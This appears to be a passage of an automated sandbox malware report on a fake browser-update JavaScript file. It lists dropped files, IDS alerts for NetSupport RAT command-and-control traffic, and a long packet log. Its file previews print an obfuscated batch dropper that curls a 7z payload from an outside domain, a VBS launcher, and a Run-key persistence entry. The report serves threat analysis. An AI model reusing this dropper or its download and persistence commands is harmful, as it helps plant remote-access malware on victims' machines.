Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\sett.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	247
Entropy (8bit):	5.268695115375571
Encrypted:	false
SSDEEP:	6:CxBR2wkn23f9QSkCfFlCe8UlLAHbKx48HKmnOB1wkn23fQRnn:cnRfONCfFADC0vTmnOofcnn
MD5:	893A1811A6A60C8A87E0D6975D95D96B
SHA1:	62101790885E6C3905A9721B488E4F6F0D79B113
SHA-256:	5A4070DB1A2B43D0BC50A1006B0153F1D9C6305767D659FE7FAEDA8E5CEC852D
SHA-512:	3A88FF32CAC06C6265AF88BAF7A954D5518AAC145E8DBE0C981F9971E31206CDDE64F9F5A720D6925915278D1B0E108413838437CF8EA632D5AAFFC0CD7E28D1
Malicious:	false
Preview:	if not exist "C:\Users\user\AppData\Local\Temp/lolo.7z" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" ) .."C:\Users\user\AppData\Local\Temp/sett.bat"..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\11[1].bat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1908
Entropy (8bit):	5.243181486469752
Encrypted:	false
SSDEEP:	24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
MD5:	CC74CF81F442E922B077F6CF0F87FA41
SHA1:	D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
SHA-256:	6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
SHA-512:	1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
Malicious:	false
Preview:	@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\loca[1].htm

Download File

Process:	C:\ProgramData\client32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	2.8402239289418514
Encrypted:	false
SSDEEP:	3:yAcn:yV
MD5:	020DF0663B4F5741AD652976C4207B0B
SHA1:	50AAA69D3EA68A7B16AA8FCBD866A6598EC39392
SHA-256:	0B4688799BA0DF92A3730B63635CC57F19DF94357AE63850AB96771A5711A3E1
SHA-512:	A6CA0A74AC46AB3A42B61A534BD97D167DF6900627E9076D75C40744D9B87EF71C26C9D8C797D5B410BFEF8A7805B87DE81CCC9BB76743B69678C083E3B07AE9
Malicious:	false
Preview:	47.1772,8.42719

C:\Users\user\AppData\Local\Temp\b1.vbs

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.6987263671247135
Encrypted:	false
SSDEEP:	3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
MD5:	A883AA8226B7A6328633EB161B7EFB85
SHA1:	9493C6A36F9155D2C210E98582B7DEDC2E92987A
SHA-256:	EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
SHA-512:	A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
Malicious:	true
Preview:	CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

C:\Users\user\AppData\Local\Temp\b2.vbs

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.6987263671247135
Encrypted:	false
SSDEEP:	3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
MD5:	A883AA8226B7A6328633EB161B7EFB85
SHA1:	9493C6A36F9155D2C210E98582B7DEDC2E92987A
SHA-256:	EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
SHA-512:	A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
Malicious:	true
Preview:	CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

C:\Users\user\AppData\Local\Temp\b3.vbs

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.6987263671247135
Encrypted:	false
SSDEEP:	3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
MD5:	A883AA8226B7A6328633EB161B7EFB85
SHA1:	9493C6A36F9155D2C210E98582B7DEDC2E92987A
SHA-256:	EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
SHA-512:	A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
Malicious:	true
Preview:	CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

\Device\ConDrv

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	817
Entropy (8bit):	5.0668216874897265
Encrypted:	false
SSDEEP:	12:p5gXLDM+zWZiTknz4oG4qixLKjoKLkVKWPpx6osPChYT1kmLB806GLYIQKI9DlHM:p5gXZWZiTOzr2jtgJ6lPHHNIbHM
MD5:	52CE7FD84FE8DA2C5774CB7681DA4A75
SHA1:	E339AF48FD51F99CA41BEE55445AC756CA1FF3BE
SHA-256:	A61C29FF09042B0C2021B3F66BD905109AF04C27EBEDB6AF568A79ECF96784BB
SHA-512:	1DD001AA6B82715DEE7ABA7B5D5C8B8DBE39E88A66B760947B86A78056A66DB539D2DAEDB5792872953E06C6B94839B20B80C5F87CACC6866DFB393FC5E4FA73
Malicious:	false
Preview:	..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\ProgramData\lolo.7z....Extracting PScripts..Extracting CacheDate.dat..Extracting CacheMD5.dat..Extracting NSM.ini..Extracting nsm_vpro.ini..Extracting nskbfltr.inf..Extracting NSM.LIC..Extracting desktop.ini..Extracting client32.ini..Extracting PScripts\insert_delimiter.pscript..Extracting PScripts\rot-13.pscript..Extracting CacheURL.dat..Extracting HTML_Obj_list.txt..Extracting Settings.txt..Extracting client32.exe..Extracting remcmdstub.exe..Extracting HTCTL32.DLL..Extracting msvcr100.dll..Extracting pcicapi.dll..Extracting PCICHEK.DLL..Extracting PCICL32.DLL..Extracting TCCTL32.DLL..Extracting putty.exe....Everything is Ok....Folders: 1..Files: 22..Size: 7115655..Compressed: 2306944..

\Device\Null

Download File

Process:	C:\Windows\System32\reg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	123
Entropy (8bit):	5.145369538607512
Encrypted:	false
SSDEEP:	3:+v8Nwqp2YqrZfyM1K7eDfFFFFqu//3d+RICkREvLAd0:rNgZH1jzLd+iW40
MD5:	0587DF28B683C9AE9BF19D2A34DC1CE0
SHA1:	D46563275A3123A5DDED28F4DDB609F1B04C8A20
SHA-256:	46B93A34BB7E073C9C65F891D0A7D1782881E50F411385416A5ED3866948EC20
SHA-512:	DE577BAEAF2176B24CA10F2A71AFF6C0376D99955A1CADB0B2ECEF204EA5B38359C4F4B754EA6738941A85DF8EA8E1B18EE0301FE61D96DAF7830C3E9BEFD1F5
Malicious:	false
Preview:	..HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.. CachedX REG_SZ C:\ProgramData\client32.exe....

Static File Info

General

File type:	ASCII text, with CRLF, LF line terminators
Entropy (8bit):	5.406050034443632
TrID:
File name:	Browser_update16.0.5836.js
File size:	499 bytes
MD5:	8fb80e0a6f0c305371b8dc11db0c1552
SHA1:	6a526ca78d175b5ec46fd4dd5fdc3f0591cb4eb7
SHA256:	734666652f013df6bb435fe22fdd811274efb8e09e3fef9a2495396319d1d1e5
SHA512:	aa6943dfd13e0690459708fc321960291c8f5bd15147e8bd09d0addb12f8c7764b169cf4dd3211ab13fd3ba38a5399d907b9a852eef31b20573198c6ca1052f6
SSDEEP:	6:2LGXpLytGAv2FFOMv+AUVsSKh/m4Ek1X/eSOjKhQ1C02Yyz9H0+usBPzjLx1ATg0:2QlGGAaF9EkdGVw09yRH1cTE6Xqmu2n
TLSH:	58F0C00D75927460020365E1A267082BF45AE615C70E5488E154DBAC1C2080C877ADEB
File Content Preview:	(function(){....// Extended JavaScript BN functions, required for RSA private ops.....// Version 1.1: new BigInteger('0', 10) returns 'proper' zero..// Version 1.2: square() API, isProbablePrime fix....// (public)......});./20230801 - 18533/var e;e=func

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.68.8.8.849448532854911 08/02/23-10:16:17.568207	UDP	2854911	ETPRO TROJAN Fake Browser Update Domain in DNS Lookup	49448	53	192.168.2.6	8.8.8.8
192.168.2.6185.9.147.166497054432854914 08/02/23-10:16:17.742725	TCP	2854914	ETPRO TROJAN Fake Browser Update Domain in TLS SNI	49705	443	192.168.2.6	185.9.147.166
192.168.2.694.158.247.234971050502827745 08/02/23-10:19:37.575836	TCP	2827745	ETPRO TROJAN NetSupport RAT CnC Activity	49710	5050	192.168.2.6	94.158.247.23

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2023 10:35:10.932359934 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:10.932420969 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:10.934309006 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:10.938116074 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:10.938173056 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.074028015 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.074117899 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.078140020 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.078170061 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.078598022 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.133223057 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.334702015 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.374811888 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476666927 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476733923 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476752043 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476795912 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476823092 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.476841927 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.479989052 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.480019093 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.480032921 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.480104923 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.480123997 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.480170965 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535418987 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535459042 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535545111 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535567045 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535583973 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535588980 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535623074 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535752058 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535770893 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535881042 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535881042 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535881042 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.535901070 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.535919905 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.594311953 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.594357967 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.594487906 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.594511032 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.594604015 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.594630003 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.594670057 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.594707012 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.594966888 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595000029 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595226049 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.595237970 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595299959 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595336914 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595444918 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.595457077 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595515966 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595546961 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.595968962 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.595985889 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.596473932 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653347015 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653388023 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653467894 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653486967 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653523922 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653542995 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653551102 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653569937 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653594017 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653606892 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.653729916 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.653745890 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654293060 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654305935 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.654321909 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654337883 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654370070 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.654381990 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654709101 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654746056 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.654756069 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654776096 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.654798031 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.654836893 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.654983997 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655018091 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655082941 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655102968 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655325890 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655359983 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655469894 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655482054 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655514002 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655549049 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655628920 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655654907 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655807972 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655817032 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655864954 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.655977011 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.655998945 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656286955 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656344891 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656351089 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.656380892 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656410933 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.656461000 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.656606913 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656637907 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.656780958 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.657572985 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.657713890 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.659033060 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.659053087 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.660654068 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.660686970 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.712454081 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712493896 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712583065 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712641001 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712692976 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.712721109 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712740898 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.712779045 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.712910891 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.712943077 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.713021994 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.713032961 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.714485884 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.714534044 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.714622974 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.714643002 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.715251923 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.715553045 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.715589046 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.715698004 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.715708971 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.715735912 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.716048002 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716087103 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716147900 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.716159105 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716200113 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.716461897 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716490984 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716578007 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.716590881 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.716614008 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.717237949 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717274904 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717351913 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.717370987 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717391014 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.717556000 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717602015 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717727900 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.717742920 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717757940 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.717914104 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.717941046 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.718038082 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.718051910 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.718069077 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719074011 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719103098 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719198942 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719222069 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719242096 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719360113 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719387054 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719593048 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719604969 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719626904 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719688892 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719710112 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719897032 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719907999 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.719937086 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.719996929 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.720016003 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.720097065 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:11.720206976 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.720243931 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.720463037 CEST	49692	443	192.168.2.4	185.9.147.166
Aug 2, 2023 10:35:11.720480919 CEST	443	49692	185.9.147.166	192.168.2.4
Aug 2, 2023 10:35:12.751987934 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.752043962 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:12.752513885 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.753489017 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.753514051 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:12.887907982 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:12.899519920 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.947150946 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.947185993 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:12.947590113 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:12.947915077 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.948551893 CEST	49693	443	192.168.2.4	188.127.230.147
Aug 2, 2023 10:35:12.990811110 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:13.010325909 CEST	443	49693	188.127.230.147	192.168.2.4
Aug 2, 2023 10:35:13.010345936 CEST	443	49693	188.127.230.147	192.168.2.4
